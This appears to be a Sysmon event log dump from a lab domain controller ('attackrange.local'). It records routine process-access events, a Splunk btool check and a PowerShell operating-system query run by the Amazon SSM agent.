13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5400-000000009A01}3988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.243{08A6967A-429A-6000-4F00-000000009A01}38802220C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{08A6967A-429B-6000-5400-000000009A01}3988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.249{08A6967A-429B-6000-5400-000000009A01}3988C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-429A-6000-4F00-000000009A01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 11241100x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.196{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_tdfamdut.vu0.ps12021-01-14 13:09:47.196 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.196{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429A-6000-5100-000000009A01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.196{08A6967A-429A-6000-5100-000000009A01}40204044C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.196{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.161{08A6967A-429B-6000-5300-000000009A01}25762512C:\Windows\system32\conhost.exe{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.153{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5300-000000009A01}2576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.150{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.150{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.150{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.150{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.150{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.150{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.149{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.149{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.149{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.149{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.149{08A6967A-4298-6000-3000-000000009A01}23763620C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:47.148{08A6967A-429B-6000-5200-000000009A01}3748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429C-6000-6600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.962{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 